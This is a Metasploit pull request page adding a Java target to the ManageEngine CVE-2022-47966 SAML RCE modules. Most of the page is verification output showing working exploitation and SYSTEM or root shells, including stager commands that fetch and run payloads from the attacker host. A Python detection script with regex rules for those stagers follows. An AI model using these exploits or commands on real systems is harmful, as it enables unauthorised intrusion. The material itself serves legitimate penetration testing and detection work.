
Enhance ManageEngine Endpoint Central and ServiceDesk Plus CVE-2022-47966 #18796

Merged
merged 5 commits into from Mar 4, 2024

Conversation

errorxyz
Contributor

@errorxyz errorxyz commented Feb 6, 2024

Related to #17641
Continuation of #18515

Changes

  1. Add java target for manageengine endpoint central cve-2022-47966
  2. Change default payload for windows command target on both endpoint_central and servicedesk_plus
  3. Minor changes to manageengine service desk plus cve-2022-47966 to use random variables in initial payload

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966
  • Verify the thing does what it should
  • Verify the thing does not do what it should not

Example Usage - Endpoint Central on Windows Server 2019 - target java

Setup link

msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > options

Module options (exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   DELAY      5                     yes       Number of seconds to wait between each request
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8020                  yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /SamlResponseServlet  yes       The SAML endpoint URL
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
                                       listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (java/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java (in-memory)



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > set rhosts 192.168.2.135
rhosts => 192.168.2.135
msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 192.168.2.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. SAML-based SSO is enabled.
[*] Executing Java (in-memory) for java/shell_reverse_tcp
[*] Using URL: http://192.168.2.1:8080/qQmwOSGlwBx/
[*] Command shell session 1 opened (192.168.2.1:4444 -> 192.168.2.135:49885) at 2024-02-06 22:44:12 +0530
[*] Exploit completed.
[*] Server stopped.


Shell Banner:
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.
-----
          

C:\Program Files\DesktopCentral_Server\bin>whoami
whoami
nt authority\system

C:\Program Files\DesktopCentral_Server\bin>exit  
exit
[*] 192.168.2.135 - Command shell session 1 closed.

@errorxyz
Contributor Author

errorxyz commented Feb 6, 2024

Verification for manageengine servicedesk plus on linux

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > options

Module options (exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   DELAY      5                     yes       Number of seconds to wait between each request
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8080                  yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /SamlResponseServlet  yes       The SAML endpoint URL
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
                                       listen on all addresses.
   SRVPORT  5000             yes       The local port to listen on.


Payload options (java/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java (in-memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://127.0.0.1:5000/I6J29gqq8O/
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:42432) at 2024-02-06 23:58:20 +0530
[*] Exploit completed.
[*] Server stopped.

whoami
errorxyz

@errorxyz errorxyz marked this pull request as ready for review February 6, 2024 18:34
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment


Thanks for updating this @errorxyz. I left a few other comments and suggestions after testing.

These also apply to the modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb module, but I wasn't able to add the review inline. Note that for this module, I found an issue that prevented the Unix Command target from working, and it has been fixed here. You should rebase your branch to bring in this fix and have this module work with this target.

@errorxyz errorxyz changed the title from "Add java target for ManageEngine Endpoint Central CVE-2022-47966" to "Enhance ManageEngine Endpoint Central and ServiceDesk Plus CVE-2022-47966" Feb 22, 2024
@cdelafuente-r7
Contributor

Thank you for updating this @errorxyz. It looks good to me now. I tested both modules against Linux and Windows and verified I got a session each time. I'll go ahead and land it. Thank you again for your contribution.

Note that, as I commented above, I'll update the default Java payload to java/meterpreter/reverse_tcp.

Example output

ManageEngine ServiceDesk Plus

Target 0 (Java) on Linux
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload payload/java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.30 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.120.1:8080/bEsYSoQclAd/
[*] GET /bEsYSoQclAd/metasploit/Payload.class requested
[+] Sending the main payload class
[*] HEAD /bEsYSoQclAd/metasploit.dat requested
[+] Sending 200
[*] GET /bEsYSoQclAd/metasploit.dat requested
[+] Sending the payload configuration data
[*] HEAD /bEsYSoQclAd/metasploit/Payload.class requested
[+] Sending 200
[*] GET /bEsYSoQclAd/metasploit/Payload.class requested
[+] Sending the main payload class
[*] Sending stage (57971 bytes) to 192.168.120.30
[*] Meterpreter session 12 opened (192.168.120.1:4444 -> 192.168.120.30:55088) at 2024-03-04 18:37:31 +0100
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : ubuntu22
OS              : Linux 6.2.0-33-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
Target 0 (Java) on Windows
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.41 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.120.1:8080/4bBoom9/
[*] GET /4bBoom9/metasploit/Payload.class requested
[+] Sending the main payload class
[*] HEAD /4bBoom9/metasploit.dat requested
[+] Sending 200
[*] GET /4bBoom9/metasploit.dat requested
[+] Sending the payload configuration data
[*] HEAD /4bBoom9/metasploit/Payload.class requested
[+] Sending 200
[*] GET /4bBoom9/metasploit/Payload.class requested
[+] Sending the main payload class
[*] Sending stage (57971 bytes) to 192.168.120.41
[*] Meterpreter session 13 opened (192.168.120.1:4444 -> 192.168.120.41:49793) at 2024-03-04 19:15:03 +0100
[*] Server stopped.

meterpreter > getuid
Server username: WIN2019$
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows
Target 1 (Windows EXE Dropper)
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.41 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAA[...SNIP...]
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (201798 bytes) to 192.168.120.41
[*] Meterpreter session 6 opened (192.168.120.1:4444 -> 192.168.120.41:49861) at 2024-03-04 18:27:36 +0100
[*] Command Stager progress - 100.00% done (12025/12025 bytes)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
Target 2 (Windows Command)
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload cmd/windows/https/x64/meterpreter/reverse_tcp
payload => cmd/windows/https/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.41 lhost=192.168.120.1

[*] Command to run on remote host: curl -sko %TEMP%\UGkJQNKCL.exe https://192.168.120.1:8080/sgPmScU7zjtTGqTaXTbkKg & start /B %TEMP%\UGkJQNKCL.exe
[*] Fetch handler listening on 192.168.120.1:8080
[*] HTTPS server started
[*] Adding resource /sgPmScU7zjtTGqTaXTbkKg
[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Client 192.168.120.41 requested /sgPmScU7zjtTGqTaXTbkKg
[*] Sending payload to 192.168.120.41 (curl/7.83.1)
[*] Sending stage (201798 bytes) to 192.168.120.41
[*] Meterpreter session 7 opened (192.168.120.1:4444 -> 192.168.120.41:49873) at 2024-03-04 18:29:18 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
Target 3 (Unix Command)
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.30 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (24772 bytes) to 192.168.120.30
[*] Meterpreter session 4 opened (192.168.120.1:4444 -> 192.168.120.30:44628) at 2024-03-04 18:18:52 +0100

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : ubuntu22
OS              : Linux 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep  7 10:33:52 UTC 2
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
Target 4 (Linux Dropper)
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.30 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.120.1:8080/0phg5I/
[*] Generated command stager: ["curl -so /tmp/soURUDTJ http://192.168.120.1:8080/0phg5I/;chmod +x /tmp/soURUDTJ;/tmp/soURUDTJ;rm -f /tmp/soURUDTJ"]
[*] Client 192.168.120.30 requested /0phg5I/
[*] Sending payload to 192.168.120.30
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.120.30
[*] Meterpreter session 5 opened (192.168.120.1:4444 -> 192.168.120.30:48208) at 2024-03-04 18:20:07 +0100
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.120.30
OS           : Ubuntu 22.04 (Linux 6.2.0-33-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

ManageEngine Endpoint Central

Target 0 (Java) on Windows
msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.46 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. SAML-based SSO is enabled.
[*] Executing Java (in-memory) for java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.120.1:8080/fu5ix37ufFOc/
[*] GET /fu5ix37ufFOc/metasploit/Payload.class requested
[+] Sending the main payload class
[*] HEAD /fu5ix37ufFOc/metasploit.dat requested
[+] Sending 200
[*] GET /fu5ix37ufFOc/metasploit.dat requested
[+] Sending the payload configuration data
[*] HEAD /fu5ix37ufFOc/metasploit/Payload.class requested
[+] Sending 200
[*] GET /fu5ix37ufFOc/metasploit/Payload.class requested
[+] Sending the main payload class
[*] Sending stage (57971 bytes) to 192.168.120.46
[*] Meterpreter session 14 opened (192.168.120.1:4444 -> 192.168.120.46:49918) at 2024-03-04 19:42:34 +0100
[*] Server stopped.

meterpreter > getuid
Server username: WIN2019$
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows
Target 1 (Windows EXE Dropper)
msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.46 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. SAML-based SSO is enabled.
[*] Executing Windows EXE Dropper for windows/x64/meterpreter/reverse_tcp
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...SNIP...]
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (201798 bytes) to 192.168.120.46
[*] Meterpreter session 15 opened (192.168.120.1:4444 -> 192.168.120.46:50020) at 2024-03-04 19:47:51 +0100
[*] Command Stager progress - 100.00% done (12025/12025 bytes)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
Target 2 (Windows Command)
msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.46 lhost=192.168.120.1

[*] Command to run on remote host: curl -sko %TEMP%\DONwHGcIdx.exe https://192.168.120.1:8080/sgPmScU7zjtTGqTaXTbkKg & start /B %TEMP%\DONwHGcIdx.exe
[*] Fetch handler listening on 192.168.120.1:8080
[*] HTTPS server started
[*] Adding resource /sgPmScU7zjtTGqTaXTbkKg
[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. SAML-based SSO is enabled.
[*] Executing Windows Command for cmd/windows/https/x64/meterpreter/reverse_tcp
[*] Client 192.168.120.46 requested /sgPmScU7zjtTGqTaXTbkKg
[*] Sending payload to 192.168.120.46 (curl/7.83.1)
[*] Sending stage (201798 bytes) to 192.168.120.46
[*] Meterpreter session 16 opened (192.168.120.1:4444 -> 192.168.120.46:50539) at 2024-03-04 20:17:41 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
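
Detection-side note on the verbose output above, as an added example that is not part of this PR or of the Metasploit project's code: the Windows Command, Windows EXE Dropper and Linux Dropper targets all leave the same three process-creation shapes on the host (a curl download into %TEMP% followed by start /B, chunked echo of a base64 blob beginning with the MZ header "TVqQ", and a curl-to-/tmp then chmod +x then execute chain), each spawned by the product's Java server process. The script below matches those shapes over constructed process-creation events; the parent-process paths and the benign control event are assumptions for the sample, not values from the page.

```python
import re

# Patterns derived from the stager command lines visible in the PR's verbose output.
RULES = {
    # "curl -sko %TEMP%\X.exe https://... & start /B %TEMP%\X.exe" (Windows Command target)
    "win_curl_temp_exe_start": re.compile(
        r"curl\s+-\S*o\s+%TEMP%\\\S+\.exe\s+https?://\S+.*\bstart\s+/B\b", re.IGNORECASE),
    # "echo TVqQAAMAAAAEAAAA..." chunks: base64 of an MZ header (Windows EXE Dropper target);
    # base64 is case-sensitive, so no IGNORECASE here
    "win_echo_base64_mz": re.compile(r"\becho\s+TVqQ[A-Za-z0-9+/=]{16,}"),
    # "curl -so /tmp/X http://...;chmod +x /tmp/X;/tmp/X" (Linux Dropper target); \1 ties the
    # download path to the chmod and exec path so unrelated curl usage does not fire
    "unix_curl_tmp_chmod_exec": re.compile(
        r"curl\s+-\S*o\s+(/tmp/\S+)\s+https?://\S+;\s*chmod\s+\+x\s+\1;\s*\1"),
}

# Constructed process-creation events (assumed field names; not real telemetry).
# Parent paths are assumptions about where the ManageEngine JRE lives.
SAMPLE_EVENTS = [
    {"host": "WIN2019",
     "parent": r"C:\Program Files\DesktopCentral_Server\jre\bin\java.exe",  # assumed path
     "cmdline": r"cmd /c curl -sko %TEMP%\UGkJQNKCL.exe https://192.168.120.1:8080/sgPmScU7zjtTGqTaXTbkKg & start /B %TEMP%\UGkJQNKCL.exe"},
    {"host": "WIN2019",
     "parent": r"C:\Program Files\DesktopCentral_Server\jre\bin\java.exe",  # assumed path
     "cmdline": r"cmd /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> %TEMP%\stage.b64"},
    {"host": "ubuntu22",
     "parent": "/opt/ManageEngine/ServiceDesk/jre/bin/java",  # assumed path
     "cmdline": "sh -c curl -so /tmp/soURUDTJ http://192.168.120.1:8080/0phg5I/;chmod +x /tmp/soURUDTJ;/tmp/soURUDTJ;rm -f /tmp/soURUDTJ"},
    {"host": "WIN2019",  # benign control: an operator downloading a report, no start /B, not from Java
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "curl -o report.csv https://intranet.example.test/export"},
]


def java_parent(event):
    """True when the parent image is java / java.exe (the web application server process)."""
    return re.search(r"(^|[\\/])java(\.exe)?$", event["parent"], re.IGNORECASE) is not None


def classify(event):
    """Return the names of the stager rules the event's command line matches.
    When at least one rule fires and the parent is Java, append a context tag so
    an analyst can rank web-shell-style spawns above a human typing the same thing."""
    hits = [name for name, rx in RULES.items() if rx.search(event["cmdline"])]
    if hits and java_parent(event):
        hits.append("spawned_by_java")
    return hits


def scan(events):
    """Return (host, hits) for every event that matched at least one rule."""
    findings = []
    for event in events:
        hits = classify(event)
        if hits:
            findings.append((event["host"], hits))
    return findings


if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)}")
```

The three stager rules are tied to the exact shapes printed by the modules, so they are narrow; the parent-process tag is what makes them useful in practice, since a curl spawned by the application server's JVM is the common thread across all of the targets shown above regardless of payload.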

@cdelafuente-r7 cdelafuente-r7 added the rn-enhancement release notes enhancement label Mar 4, 2024
@cdelafuente-r7 cdelafuente-r7 merged commit 97513d4 into rapid7:master Mar 4, 2024
35 checks passed
@cdelafuente-r7
Contributor

Release Notes

This updates the ManageEngine Endpoint Central and ServiceDesk Plus RCE modules for CVE-2022-47966. Particularly, it adds a Java target to be able to use Java-based payloads.

@errorxyz errorxyz deleted the manageengine branch March 14, 2024 20:14